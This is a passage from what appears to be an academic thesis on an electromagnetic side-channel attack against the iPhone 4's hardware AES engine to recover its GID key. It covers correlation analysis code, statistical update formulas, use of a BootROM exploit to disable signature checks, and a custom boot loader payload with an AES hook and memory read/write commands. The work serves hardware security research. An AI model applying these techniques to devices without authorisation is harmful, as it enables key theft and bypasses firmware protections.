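def cpa(plaintexts, samples):
    """Return the key guess with the highest absolute correlation."""
    scores = {}
    for guess in range(16):
        hypothesis = [hamming_weight(SBOX[p ^ guess]) for p in plaintexts]
        scores[guess] = abs(pearson(hypothesis, samples))
    return max(scores, key=scores.get), scores


TRUE_KEY = 0x9
plaintexts, samples = simulate_measurements(TRUE_KEY, 2000, 0.5, seed=1)
best_guess, scores = cpa(plaintexts, samples)
```

A real attack evaluates the correlation for every point in time of the trace and for every key byte; this sketch uses a single sample per trace to keep the example short.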

2.2.6 The EM Side-channel

Side-channel attacks like Simple Power Analysis (SPA) and Differential Power Analysis (DPA) by Kocher et al. have been exploiting the power consumption since 1999[KJJ99]. However, sometimes the power side-channel is unavailable due to countermeasures or other practical obstacles. The EM side-channel provides a more powerful alternative to the classical power side-channel, which can sometimes be exploited even in the presence of power side-channel countermeasures. While the power side-channel provides only a single aggregated view of the circuit's power consumption, the EM side-channel can be used to inspect various signals at different frequencies. Furthermore, by carefully choosing a probe position, it is possible to focus on one specific area of the circuit and to ignore unrelated processes happening at other physical locations.

Agrawal et al. divide EM emanations into two categories[AARR03], as described in the following.

Direct emanations result from intentional current flows, usually consisting of short bursts of current observable over a wide frequency band. In order to get good results with direct emanations, tiny field probes need to be positioned very close to the signal source, which might require decapsulating the chip packaging.

Unintentional emanations are caused by electrical and electromagnetic coupling between components in close proximity. They are the most interesting for this thesis. The effect is amplified by capacitors and the capacitance of power lines, as they emanate a stronger signal when their charge changes compared to emanations of logic gates and data lines.

2.2.7 Update Formulas

When further processing a large scale measurement, available resources like Random Access Memory (RAM) or computing power limit the computation of correlations using standard formulas. A solution to this problem are incremental and pairwise update formulas[SMG15], which provide an efficient, scalable and parallelizable way of computing the mean, variance and correlation.

2.2.7.1 Incremental Mean Update Formula

The standard formula for computing the mean is

$$\mu_Q = \frac{1}{n} \sum_{i=1}^{n} x_i$$

If we add a new element to the set without updating the mean, the old mean is computed as

$$\mu_Q = \frac{1}{n-1} \sum_{i=1}^{n-1} x_i$$

We call the updated mean

$$\mu'_Q = \frac{1}{n} \sum_{i=1}^{n} x_i = \frac{1}{n} \left( \sum_{i=1}^{n-1} x_i + x_n \right)$$

Next, the equation of the old mean is written as

$$\sum_{i=1}^{n-1} x_i = (n-1)\mu_Q$$

and inserted into the new mean equation, resulting in

$$\mu'_Q = \frac{1}{n} \left( (n-1)\mu_Q + x_n \right)$$

By applying the transformation

$$\frac{1}{n} \left( (n-1)\mu_Q + x_n \right) = \frac{1}{n} \left( n\mu_Q - \mu_Q + x_n \right) = \frac{n\mu_Q}{n} + \frac{-\mu_Q + x_n}{n} = \mu_Q - \frac{\mu_Q - x_n}{n}$$

we get the incremental update formula

$$\mu'_Q = \mu_Q - \frac{\Delta}{n} \quad \text{for} \quad \Delta = \mu_Q - x_n$$
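The incremental mean update can be written as a one-line function. The following is a minimal sketch; the function name `update_mean` and the sample values are assumptions made for illustration.

```python
def update_mean(old_mean, n, x_n):
    """Mean of n elements, given the mean of the first n - 1 elements and x_n."""
    delta = old_mean - x_n
    return old_mean - delta / n


samples = [2.0, 4.0, 4.0, 5.0, 10.0]
mean = 0.0  # placeholder for the empty set; for n = 1 the update returns x_1
for n, x in enumerate(samples, start=1):
    mean = update_mean(mean, n, x)
print(mean, sum(samples) / len(samples))
```

Only the current mean and the element count have to be kept in memory, so the samples can be processed as a stream.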

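2.2.7.2 Incremental Variance Update Formula

The standard formula for computing the variance is

$$\sigma_Q^2 = \frac{1}{n} \sum_{i=1}^{n} (x_i - \mu_Q)^2$$

However, in order to create an incremental update formula, we will use the unnormalized second central moment (the sum of squared deviations from the mean) instead, in the following simply called the central moment, which is defined as

$$s_Q^2 = \sum_{i=1}^{n} (x_i - \mu_Q)^2$$

Following the same procedure as before we get

$$s_Q^2 = \sum_{i=1}^{n-1} (x_i - \mu_Q)^2$$

if we add one element to the set, but do not update the central moment or the mean. Thus, to get the new central moment we write

$$s_{Q'}^2 = \sum_{i=1}^{n} (x_i - \mu_{Q'})^2 = \sum_{i=1}^{n-1} (x_i - \mu_{Q'})^2 + (x_n - \mu_{Q'})^2$$

From Section 2.2.7.1 we know that $\mu_{Q'}$ can be written as

$$\mu_{Q'} = \mu_Q - \frac{\Delta}{n} \quad \text{with} \quad \Delta = \mu_Q - x_n$$

By inserting that into the central moment formula, we get

$$\begin{aligned}
s_{Q'}^2 &= \sum_{i=1}^{n-1} \left( x_i - \mu_Q + \frac{\Delta}{n} \right)^2 + \left( x_n - \mu_Q + \frac{\Delta}{n} \right)^2 \\
&= \sum_{i=1}^{n-1} \left( (x_i - \mu_Q)^2 + 2(x_i - \mu_Q)\frac{\Delta}{n} + \left( \frac{\Delta}{n} \right)^2 \right) + \left( x_n - \mu_Q + \frac{\Delta}{n} \right)^2 \\
&= \sum_{i=1}^{n-1} (x_i - \mu_Q)^2 + \sum_{i=1}^{n-1} 2(x_i - \mu_Q)\frac{\Delta}{n} + (n-1)\left( \frac{\Delta}{n} \right)^2 + \left( x_n - \mu_Q + \frac{\Delta}{n} \right)^2 \\
&= s_Q^2 + \frac{2\Delta}{n} \sum_{i=1}^{n-1} (x_i - \mu_Q) + \frac{(n-1)\Delta^2}{n^2} + \left( -(\mu_Q - x_n) + \frac{\Delta}{n} \right)^2
\end{aligned}$$

Next, we insert

$$(\mu_Q - x_n) = \Delta \quad \text{and} \quad \frac{2\Delta}{n} \sum_{i=1}^{n-1} (x_i - \mu_Q) = 0$$

This results in

$$s_{Q'}^2 = s_Q^2 + 0 + \frac{(n-1)\Delta^2}{n^2} + \left( \frac{\Delta}{n} - \Delta \right)^2$$

which we transform to

$$\begin{aligned}
s_{Q'}^2 &= s_Q^2 + \frac{(n-1)\Delta^2}{n^2} + \left( \frac{\Delta}{n} - \frac{n\Delta}{n} \right)^2 \\
&= s_Q^2 + \frac{(n-1)\Delta^2}{n^2} + \left( \frac{(1-n)\Delta}{n} \right)^2 \\
&= s_Q^2 + \frac{(n-1)\Delta^2}{n^2} + \frac{(1-n)^2\Delta^2}{n^2} \\
&= s_Q^2 + \frac{(n-1)\Delta^2 + (1 - 2n + n^2)\Delta^2}{n^2} \\
&= s_Q^2 + \frac{(n^2 - n)\Delta^2}{n^2} \\
&= s_Q^2 + \frac{\Delta^2 (n-1)}{n}
\end{aligned}$$

Thus, we get the incremental formula

$$s_{Q'}^2 = s_Q^2 + \frac{\Delta^2 (n-1)}{n}$$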

for the central moment, which can be used in place of the variance during online computations. The variance can be retrieved from the central moment at any time by dividing by the number of elements in the set

$$\sigma_Q^2 = \frac{1}{n} s_Q^2$$

Finally, we need to prove

$$\frac{2\Delta}{n} \sum_{i=1}^{n-1} (x_i - \mu_Q) = 0$$

Therefore, we show

$$\begin{aligned}
0 &\overset{!}{=} \sum_{i=1}^{n-1} (x_i - \mu_Q) \\
&= \sum_{i=1}^{n-1} x_i - \sum_{i=1}^{n-1} \mu_Q \\
&= (n-1) \frac{1}{n-1} \sum_{i=1}^{n-1} x_i - (n-1)\mu_Q \\
&= (n-1) \left( \frac{1}{n-1} \sum_{i=1}^{n-1} x_i - \mu_Q \right)
\end{aligned}$$

Since in our notation $Q' = Q \cup \{x_n\}$ with $n = |Q'|$, we have $|Q| = n - 1$ and thus the old mean is $\mu_Q = \frac{1}{n-1} \sum_{i=1}^{n-1} x_i$. By inserting this into our previous formula we get

$$(n-1) \left( \frac{1}{n-1} \sum_{i=1}^{n-1} x_i - \mu_Q \right) = (n-1)(\mu_Q - \mu_Q) = 0$$

and thus the sum is indeed zero. □
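A streaming computation based on the incremental formulas for the mean and the central moment could look as follows. This is a minimal sketch under assumptions: the class name `RunningStats`, its attribute names and the sample values are illustrative and not taken from the thesis code.

```python
import statistics


class RunningStats:
    """Incrementally tracks count, mean and central moment s^2 of a stream."""

    def __init__(self):
        self.n = 0
        self.mean = 0.0
        self.s2 = 0.0  # sum of squared deviations from the mean

    def update(self, x):
        self.n += 1
        delta = self.mean - x  # computed with the old mean
        self.s2 += delta * delta * (self.n - 1) / self.n
        self.mean -= delta / self.n

    def variance(self):
        """Population variance: s^2 divided by the number of elements."""
        return self.s2 / self.n


samples = [2.0, 4.0, 4.0, 4.0, 5.0, 5.0, 7.0, 9.0]
stats = RunningStats()
for x in samples:
    stats.update(x)
print(stats.mean, stats.variance(), statistics.pvariance(samples))
```

The comparison with `statistics.pvariance` is only a sanity check; in an online setting the full sample list would not be kept in memory.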

2.2.7.3 Pairwise Mean Update Formula

A generalized version of the incremental update formula from Section 2.2.7.1 is the pairwise update formula

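$$\mu_{Q'} = \mu_{Q_1} + \frac{n_2 \Delta_{2,1}}{n} \quad \text{with} \quad \Delta_{2,1} = \mu_{Q_2} - \mu_{Q_1}$$

which allows combining the separately computed means of two sets into the mean of $Q' = Q_1 \cup Q_2$ with the new cardinality $n = n_1 + n_2$.

To prove this formula we insert the definition of the mean $\mu_Q = \frac{1}{n} \sum_{i=1}^{n} x_i$ to get

$$\begin{aligned}
\mu_{Q'} &= \frac{1}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i} + \frac{n_2 \left( \frac{1}{n_2} \sum_{i=1}^{n_2} x_{Q_2,i} - \frac{1}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i} \right)}{n_1 + n_2} \\
&= \frac{\frac{n_1 + n_2}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i}}{n_1 + n_2} + \frac{\frac{n_2}{n_2} \sum_{i=1}^{n_2} x_{Q_2,i} - \frac{n_2}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i}}{n_1 + n_2} \\
&= \frac{\left( \frac{n_1}{n_1} + \frac{n_2}{n_1} \right) \sum_{i=1}^{n_1} x_{Q_1,i} + \sum_{i=1}^{n_2} x_{Q_2,i} - \frac{n_2}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i}}{n_1 + n_2} \\
&= \frac{1}{n_1 + n_2} \left( \sum_{i=1}^{n_1} x_{Q_1,i} + \frac{n_2}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i} + \sum_{i=1}^{n_2} x_{Q_2,i} - \frac{n_2}{n_1} \sum_{i=1}^{n_1} x_{Q_1,i} \right)
\end{aligned}$$

This results in

$$\mu_{Q'} = \frac{1}{n_1 + n_2} \left( \sum_{i=1}^{n_1} x_{Q_1,i} + \sum_{i=1}^{n_2} x_{Q_2,i} \right)$$

which is the definition of the mean for the set $Q' = Q_1 \cup Q_2$ with $n = n_1 + n_2$ elements. □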
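Combining two separately computed means can be sketched as follows. The function name `merge_means` and the two example chunks are assumptions made for illustration.

```python
def merge_means(mean1, n1, mean2, n2):
    """Mean of the union of two disjoint sets, from their means and sizes."""
    delta = mean2 - mean1
    return mean1 + n2 * delta / (n1 + n2)


chunk_a = [1.0, 2.0, 3.0]
chunk_b = [10.0, 20.0]
mean_a = sum(chunk_a) / len(chunk_a)
mean_b = sum(chunk_b) / len(chunk_b)
merged = merge_means(mean_a, len(chunk_a), mean_b, len(chunk_b))
direct = sum(chunk_a + chunk_b) / (len(chunk_a) + len(chunk_b))
print(merged, direct)
```

With a single-element second set (`n2 = 1`) the function reduces to the incremental update from Section 2.2.7.1.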

2.2.7.4 Pairwise Variance Update Formula

Similar to Section 2.2.7.2, the central moment (the sum of squared deviations from the mean) is again used for online computation rather than the variance. The generalized version of the incremental formula is

$$s_{Q'}^2 = s_{Q_1}^2 + s_{Q_2}^2 + \frac{n_1 n_2 \Delta_{2,1}^2}{n} \quad \text{with} \quad \Delta_{2,1} = \mu_{Q_2} - \mu_{Q_1}$$

The proof of the formula is out of scope of this thesis, although it can easily be seen that the formula reduces to the incremental formula when $|Q_2| = 1$. An example is given below:

$$\begin{aligned}
s_{Q'}^2 &= s_{Q_1}^2 + \sum_{i=1}^{1} (x_{Q_2,i} - \mu_{Q_2})^2 + n_1 \cdot 1 \cdot \frac{(\mu_{Q_2} - \mu_{Q_1})^2}{n_1 + 1} \\
&= s_{Q_1}^2 + \sum_{i=1}^{1} (x_{Q_2,i} - x_{Q_2,1})^2 + n_1 \frac{(x_{Q_2,1} - \mu_{Q_1})^2}{n_1 + 1} \\
&= s_{Q_1}^2 + 0 + n_1 \frac{(x_{Q_2,1} - \mu_{Q_1})^2}{n_1 + 1}
\end{aligned}$$

This is the same as the incremental formula in Section 2.2.7.2. Note that $\mu_{Q_2} = x_{Q_2,1}$ since $Q_2 = \{x_{Q_2,1}\}$.
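The pairwise formulas make it possible to summarize chunks of a measurement independently and to merge the summaries afterwards. The sketch below illustrates this under assumptions: the function names `summarize` and `merge`, the tuple layout `(n, mean, s2)` and the example chunks are hypothetical.

```python
def summarize(values):
    """Return (n, mean, s2) of one chunk, computed directly."""
    n = len(values)
    mean = sum(values) / n
    s2 = sum((v - mean) ** 2 for v in values)
    return n, mean, s2


def merge(stats1, stats2):
    """Combine the (n, mean, s2) summaries of two disjoint sets."""
    n1, mean1, s2_1 = stats1
    n2, mean2, s2_2 = stats2
    n = n1 + n2
    delta = mean2 - mean1
    mean = mean1 + n2 * delta / n
    s2 = s2_1 + s2_2 + n1 * n2 * delta * delta / n
    return n, mean, s2


# Each chunk could be summarized on a different machine or GPU.
chunks = [[2.0, 4.0, 4.0], [4.0, 5.0], [5.0, 7.0, 9.0]]
total = summarize(chunks[0])
for chunk in chunks[1:]:
    total = merge(total, summarize(chunk))
n, mean, s2 = total
print(n, mean, s2 / n)
```

Because `merge` only needs the three summary values per chunk, the raw samples never have to be held in memory at the same time.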

2.3 Secure Boot

The Apple iPhone 4 implements a secure boot mechanism to establish a boot chain of trust which starts at the BootROM and works its way up to the operating system kernel and further to the application level. Here we focus only on the first boot components relevant to our side-channel analysis.

On power-on, the BootROM, an immutable piece of software fused into the SoC, is executed. This is the root of the trust chain. The BootROM functionality is kept minimal, as it is the most trusted code and a vulnerability in the BootROM cannot be fixed with a software update. Its task is to load, validate and execute the first stage boot loader either from Non-Volatile Random Access Memory (NVRAM) or over Universal Serial Bus (USB). The latter is used if the former fails or if the user enters Device Firmware Upgrade (DFU) mode using a special button combination.

The first stage boot loader is also relatively small. It runs in Static Random Access Memory (SRAM), with its main responsibility being to initialize low level hardware components such as Dynamic Random Access Memory (DRAM) and to load, validate and execute the next stage boot loader.

The second stage boot loader executes in DRAM and thus has much more memory available to work with. It initializes more hardware components such as the screen. Furthermore, it loads several components like the boot logo, the devicetree[Thea] and a ramdisk (in case of a recovery/update boot). Lastly, the second stage boot loader loads, validates, initializes and executes the kernel.

Every component which is loaded before the kernel is executed (including the kernel itself) is shipped as an img3[Thec] image, which is cryptographically signed and encrypted with Cipher Block Chaining (CBC)-AES256[WFE]. Each img3 image contains an Initialization Vector (IV) and key, which are encrypted using a device model specific hardware fused Key Encryption Key (KEK), also called Group Identifier (GID) key. After the signature of the img3 image is verified, the GID key is used to decrypt the image specific IV and key, which are then in turn used to decrypt the image itself. The GID key is never exposed to the Central Processing Unit (CPU) directly. Instead, decryption oracle queries are made to a dedicated hardware AES engine[ios], which uses the GID key internally.

On newer iPhones (starting from the iPhone 4s) the second stage boot loader disables access to the GID key (enforced through hardware registers) before executing the kernel, meaning the operating system is not able to use it. Other key slots such as the User Identifier (UID) key, which is also only accessible by the AES engine, or user supplied keys can still be used by the operating system. The GID key cannot be re-enabled without rebooting the device. Thus, on newer iPhones, boot loader level code execution is required to make decryption queries to the AES engine using the GID key. This can be achieved either by using a BootROM exploit or by exploiting the first or second stage boot loader.

3 Setup

This chapter describes the setup used to perform the side-channel analysis. First, the preparation of the target device for EM measurements is described. Then, the equipment used for performing the measurements and processing the data is introduced.

3.1 Target Device

For a practical analysis of side-channel attacks on early boot encryption the Apple iPhone 4 (model iPhone3,2) was chosen as a case study. The iPhone 4 has a BootROM vulnerability allowing code execution at the highest privilege level by using either the limera1n[Thed] or the SHAtter[Hil] exploit. It is possible to perform similar analysis on newer devices such as the iPhone 8 or the iPhone X by using the checkm8[@ax] exploit, however at the time of starting this thesis checkm8 was not available and thus the iPhone 4 was chosen. The iPhone 4 has a hardware AES engine[ios] which is used to decrypt the first stage boot loader, the second stage boot loader and among others, the kernel using the GID key. The GID key is fused into hardware and is never exposed directly to the CPU, only oracle access is possible. To gain access to the CPU, the iPhone is first disassembled, the mainboard removed from its case and all peripherals are disconnected. Then, the shielding protecting the CPU is removed so that an EM probe can be placed on the chip. This can be seen in Figure 3.1.

(a) With shielding (b) Without shielding

Figure 3.1: iPhone 4 mainboard with and without metal shielding

Next, a Universal Asynchronous Receiver Transmitter (UART) connector is built[Ess] using a PodBreakout[pod] connector and a FT232RL USB to Serial Breakout Board[FT2]. This yields a connector as seen in Figure 3.2 with two USB cables, one for communicating with the iPhone and one for UART. Additionally, the volume buttons are removed from the case and wires are connected to the volume-down button (as seen in Figure 3.3) for easy access. This is done because these buttons are directly connected to the SoC's General Purpose Input/Output (GPIO) pins, thus providing a fast and low latency interface to the CPU.

(a) PodBreakout (b) FT232R

Figure 3.2: 30 pin iPhone connector with UART exposed

Figure 3.3: Exposing iPhone GPIO pins

Afterwards, the battery connector is removed (Figure 3.4) and the mainboard is driven with a lab power supply at 4.0 volts (which is slightly above the normal battery voltage), drawing on average about 0.1 ampere during the measurements. Finally, the mainboard is mounted on a stage as seen in Figure 3.5, where an EM probe can be moved precisely around the chip using stepper motors, which are controllable via computer.

Figure 3.4: iPhone 4 mainboard with battery connector removed

Figure 3.5: iPhone 4 mainboard mounted on a stage

3.2 Measurement Setup

The LeCroy WaveRunner 8254M is used for performing EM measurements (see Figure 3.6). Two of the four channels are used, one for the trigger signal and one for the EM probe, which allows a sampling rate of 40GS/s. The vertical resolution is 8 bit per sample. We use a Langer EMV-Technik RF-B 0,3-3 probe, which has a flat head with a diameter of 2mm and captures frequencies in the range from 30MHz to 3GHz. The probe is connected to a Langer EMV-Technik PA 303 SMA amplifier, which amplifies signals in the range from 100kHz to 3GHz by 30dB before the signal is passed to the oscilloscope.

3.3 Computations

All computations were performed on a machine with 20 physical (40 logical) Intel(R) Xeon(R) CPU E5-2650 v3 @ 2.30GHz CPU cores with 256GB RAM, 3 (logical) NVIDIA K80 GPUs with 12 GB VRAM each and 15 TB of network attached storage. Even though not all resources were maxed out (mostly the GPUs were used), assumptions, choices and estimations made during development of algorithms kept these resources in mind. Furthermore, to speed up computations, the correlation computations for the final attack were distributed among this machine and 20 additional machines, each with 8 (logical) Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz cores, 16 GB RAM and an Intel Corporation HD Graphics 530 Graphics Processing Unit (GPU).

Figure 3.6: LeCroy WaveRunner 8254M oscilloscope

4 Boot Loader Code Execution and AES Engine Access

In this chapter the methodology to access the AES engine as well as how to deploy a boot loader payload is described. This is required in order to perform EM measurements on the target device.

4.1 Entrypoint

Even though on the iPhone 4 the GID key can be used by the operating system in kernel mode or from userspace (when a kernel patch is applied), the entrypoint chosen here is a BootROM exploit (SHAtter[Hil]). The ability to execute code in BootROM context is used to load a patched first and second stage boot loader with signature checks disabled. Furthermore, a custom payload is deployed to the second stage boot loader. This has the advantage that the CPU is less noisy as only a single core is running and every other core is inactive. Also, the deployed custom payload is the only piece of code running during the measurements without interrupts or other threads interfering.

4.1.1 Preparation of Images

The following steps are performed to patch and prepare the boot loader images in order to be able to execute a custom payload. First, the iPhone iOS 7.1.2 firmware file is downloaded from Apple. Then, iBSS and iBEC are extracted, which are the first and second stage boot loader when performing a restore from DFU mode. Next, the images are decrypted using xpwntool[Wan] and the corresponding firmware keys obtained from theiphonewiki[Thee]. Afterwards, the images are patched using iBoot32Patcher[Fra] to remove the signature checks and to redirect iBEC's go command to jump to the load address (the location in memory where data received over USB is stored), which is 0x40000000 in our case. Since the iPhone has a 32-bit ARM CPU, the address is set to 0x40000001 to indicate that our payload will be executed in THUMB[ARM] mode. Finally, the raw binaries are packed back into an img3 file, which can be parsed by the BootROM. The full procedure can be seen in Listing B.1.
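The address adjustment for THUMB mode amounts to setting the lowest bit of the branch target, as the following small calculation illustrates. The names `LOAD_ADDRESS`, `THUMB_BIT` and `thumb_entry` are assumptions made for illustration and do not appear in the patching tools.

```python
LOAD_ADDRESS = 0x40000000  # load address given in the text
THUMB_BIT = 0x1            # bit 0 of an interworking branch target selects Thumb state


def thumb_entry(address):
    """Return the branch target that enters `address` in Thumb state."""
    if address % 2 != 0:
        raise ValueError("code address must be halfword aligned")
    return address | THUMB_BIT


entry = thumb_entry(LOAD_ADDRESS)
print(hex(entry))
```

The CPU ignores bit 0 when fetching instructions, so execution still starts at the load address itself.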

4.1.2 Payload Execution

The following steps are performed in order to get a custom payload running in the second stage boot loader. First, the iPhone is put into DFU mode. This is done by connecting the device to a computer using a USB cable and afterwards holding down the power button and home button for 10 seconds, then releasing the power button while still holding the home button for another 15 seconds. The screen stays black when DFU mode is entered successfully. After the iPhone has entered DFU mode, ipwndfu[@ax] is used to launch the SHAtter exploit to disable signature checks in the BootROM. Subsequently, irecovery[libb] is used to transfer the patched first and second stage boot loader. After loading the second stage boot loader, irecovery is used to first transfer a custom payload binary and then to interact with the second stage boot loader recovery console. By executing the previously patched go command, the uploaded payload is executed. The procedure can be seen in Listing B.2. Note: Listing B.2 boots the payload on a slightly different model (iPhone3,1), however the procedure is exactly the same on iPhone3,2.

4.2 Payload Creation

This section sums up the most important parts of Modern post exploitation techniques[@ti] and deals with how to create the payload. First, the program is written in C, then compiled to a Mach-O[App] binary and finally transformed into a freestanding raw binary which can be executed in boot loader context. In boot loader context we are dealing with an almost bare metal execution environment, thus certain restrictions apply when creating the program. The main restriction is that no external libraries can be used. To simplify the process of converting the program into a raw executable, all code is written into one single file. The main function needs to be put at the top, because the entrypoint of the program will be the very first function in the file. To provide a rudimentary environment, some functions of the standard C library are manually re-implemented with a functional equivalent. Those are: memset, memmove, strcmp, strncmp, strlen, atol. The final program is compiled on macOS using the following command:

xcrun -sdk iphoneos clang -arch armv7 gido.c -o gido.o -c -fno-stack-protector -nostdlib -Wno-incompatible-library-redeclaration

We use the clang[cla] compiler together with the iPhone Software Development Kit (SDK), which are both shipped with Xcode[Xco]. The arguments used specify that the target CPU is ARMv7 (-arch armv7), the output file is gido.o (-o gido.o), the program is compiled as an object file (-c) rather than a full executable, stack cookies (-fno-stack-protector) and standard libraries (-nostdlib) are not used, and warnings for re-declared standard library functions with different types are ignored (-Wno-incompatible-library-redeclaration).

Afterwards, the individual sections are extracted from the resulting object file using jtool[Lev] as shown in Listing 4.1. Finally, the extracted sections are assembled into a binary file, minding the alignment and spacing between individual sections, using the script in Listing B.3.

jtool -e __TEXT.__text gido.o >/dev/null 2>/dev/null
jtool -e __DATA.__data gido.o >/dev/null 2>/dev/null
jtool -e __TEXT.__cstring gido.o >/dev/null 2>/dev/null
jtool -e __TEXT.__const gido.o >/dev/null 2>/dev/null
jtool -e __TEXT.__literal8 gido.o >/dev/null 2>/dev/null
jtool -e __TEXT.__literal16 gido.o >/dev/null 2>/dev/null

Listing 4.1: Using jtool to extract certain sections of a Mach-O file
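The idea of assembling extracted sections into one raw binary while minding the spacing between them can be sketched as follows. This is not the script from Listing B.3: the function name `assemble`, the zero fill byte, and the offsets and contents in the example are hypothetical and serve only to illustrate the padding logic.

```python
def assemble(sections, fill=b"\x00"):
    """Place section blobs at their offsets, padding the gaps with `fill`."""
    image = bytearray()
    for offset, blob in sorted(sections):
        if offset < len(image):
            raise ValueError(f"section at {offset:#x} overlaps the previous one")
        image += fill * (offset - len(image))  # spacing between sections
        image += blob
    return bytes(image)


# Hypothetical offsets and contents, for illustration only.
sections = [
    (0x00, b"\x01\x02\x03"),  # e.g. contents of __TEXT.__text
    (0x10, b"hello\x00"),     # e.g. contents of __TEXT.__cstring
    (0x08, b"\xaa\xbb"),      # e.g. contents of __DATA.__data
]
image = assemble(sections)
print(len(image), image.hex())
```

In practice the offsets would have to be derived from the section addresses recorded in the Mach-O object file, so that references between sections stay valid.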

4.3 Payload Description

This section describes the program used to perform on-device measurements. Its source code can be found in Listing B.4. The first lines (lines 6 and 7) include headers for standard types like uint32_t and size_t. Then (lines 10-56), an AES S-Box and a static known key with all its round keys for AES-128, as well as function definitions and global variables for an AES-128 T-Table (see Section 2.1.1.2) implementation, are defined. Subsequently, lines 57-97 define reverse engineered boot loader internal structures and types. These are mostly taken from the Chronic-Dev cyanide[tea] project on GitHub. Next, lines 100-119 define function pointers for internal functions with their corresponding memory addresses. This allows calling boot loader functions, as they are already loaded in memory. Lines 120-126 define constants and a global pointer to the boot loader's command structure, which is used for parsing commands from the recovery console. After that (lines 128-155), the functions used within this payload are declared.

4.3.1 Payload Entrypoint

The actual code starts at line 157, with the entrypoint being an assembly stub at lines 161-164, which jumps into the reposition function (line 166). The purpose of the entrypoint assembly stub is to pad the code by 0x100 bytes (line 163), so that when the boot loader overwrites a few bytes at the beginning of the load address (where the payload lives at its invocation) it does not corrupt code or data. Next, the reposition function relocates the payload into the heap and jumps to the main function, thus making the load address available for other use.

4.3.2 Main Function

The main function (line 183) first overwrites the command handler structure, replacing built-in recovery console commands with custom commands (lines 187-220). Afterwards, it reconfigures the volume-down button GPIO pin to be a signal output rather than an input, thus making it possible to drive the wires exposed in Figure 3.3 high or low depending on the value written to a special Memory Mapped Input/Output (MMIO) address (lines 222-225). In addition, the T-Tables of the custom software AES-128 implementation are precomputed (lines 227-229) and a hook (see Section 4.3.3) is placed in the boot loader's built-in AES function.

4.3.3 AES Hook

The function responsible for placing the hook can be seen in lines 278-297. The hook replaces the instructions seen in Listing 4.2, which start two previously set up Direct Memory Access (DMA) transfers, one for sending and one for receiving, and then call a function which waits until the transfers are finished. The sending transfer signals that it is done once the data has reached the AES engine, while the receiving transfer is only done after the AES engine has decrypted the ciphertext and the plaintext has been transferred back to the DMA region.

start_aes_encryption:
0x5ff02138 orr r1, r1, #0x1
0x5ff0213c str r1, [r0]
0x5ff0213e movw r0, #0x2000
0x5ff02142 movt r0, #0x8700
0x5ff02146 ldr r1, [r0]
0x5ff02148 orr r1, r1, #0x1
0x5ff0214c str r1, [r0]
0x5ff0214e movs r0, #0x1
0x5ff02150 bl wait_and_yield
0x5ff02154 movs r0, #0x2
0x5ff02156 bl wait_and_yield
finished_aes_encryption:

Listing 4.2: Assembly of the boot loader's AES engine invocation

The code that is executed instead can be seen in Listing 4.3. First, the GPIO address of the volume-down button is loaded into register r4 and the values needed to drive the signal low and high are loaded into registers r0 and r1, respectively (lines 240-243). Then, the receive DMA channel is started (lines 247-252). It is important to start the receive channel first, because it will not finish until the AES engine has transferred the decrypted plaintext into the DMA region. This, however, can only happen after the AES engine has finished the decryption, which in turn relies on the transmission channel having finished transferring the ciphertext to the AES engine in the first place. Thus, starting the receive channel is equivalent to being able to check whether the decryption has finished or not. Afterwards, the values required to start the transmission channel are loaded into register r6 (lines 255-256) and register r7 (lines 258-259). This setup creates a tight, time critical relationship between the GPIO signal and the AES decryption (lines 261-273). Next, the exposed GPIO pin is driven high by writing a value to the corresponding MMIO address with a single store instruction (line 262) and immediately after that the transmission DMA channel is started with another store instruction (line 265). This causes the previously set up ciphertext to be transferred to the AES engine and the decryption to start. Subsequently, a tight loop follows (lines 267-271), which checks whether the receive channel has finished the transfer, indicating the end of the decryption. Once that happens, the exposed GPIO pin is set back to low (line 273). This tightly brackets the AES decryption between the rising and falling edge of the GPIO signal. Hence, this signal is used as trigger for starting the measurements with the oscilloscope each time the AES engine is used.

237 void aes_function_hook(){ //realAES
238     asm(
239         //prepare GPIO write
240         "movs r4, #0xc\n\t"
241         "movt r4, #0xbfa0\n\t"
242         "mov r0, #0x92\n\t"
243         "mov r1, #0x93\n\t"
244
245
246         //prepare DMA access
247         "movw r5, #0x2000 \t\n" //RX (r1)
248         "movt r5, #0x8700 \t\n"
249
250         "ldr r7, [r5]\t\n" //RX_val
251         "orr r7, r7, #0x1\t\n" //RX_val
252         "str r7, [r5]\t\n" //store RX first!
253
254
255         "movw r6, #0x1000 \t\n"
256         "movt r6, #0x8700 \t\n" //TX (r0)
257
258         "ldr r7, [r6]\t\n" //TX_val
259         "orr r7, r7, #0x1\t\n" //TX_val
260
261         //about to enter time critical section!
262         "strb r1, [r4]\n\t" //set GPIO high (AES_START)
263         //START_CRITICAL_SECTION
264
265         "str r7, [r6]\t\n" //store TX (AES_START)
266
267         "w1:\t\n"
268         "ldr r7, [r5]\t\n" //RX_val
269         "and r7, r7, #0x30000\t\n" //load RX_val and check for idle
270         "cmp r7, #0x10000\t\n"
271         "beq w1\t\n"
272         //-- END_CRITICAL_SECTION
273         "strb r0, [r4]\n\t" //set GPIO low
274     );
275 }

Listing 4.3: AES function replacement code

4.3.4 Command Handlers

Command handler functions are implemented in lines 301-855. These replace some of the original recovery console commands after the main function has finished. The new commands are cmd_echo, cmd_call, cmd_md, cmd_mw, aes_cmd, cmd_decypt and cmd_measure. The first four commands are intended for debugging and reverse engineering the boot loader. They allow printing text to the recovery console, calling arbitrary functions with parameters by jumping to a specified address, as well as reading and writing memory, respectively.

Calling aes_cmd starts an infinite loop of AES encryptions or decryptions with a custom specified block length. This is useful for visually inspecting EM traces with an oscilloscope to find a good position for the EM probe on the chip as well as the right voltage range settings.

The aes_decypt function is used to decrypt several blocks of ciphertext using the GID key. This is useful for decrypting a batch of ciphertexts from recorded traces, as the AES output is not saved during the measurement phase for performance reasons. Furthermore, it is possible to parallelise batch decryption by using multiple iPhones of the same model.

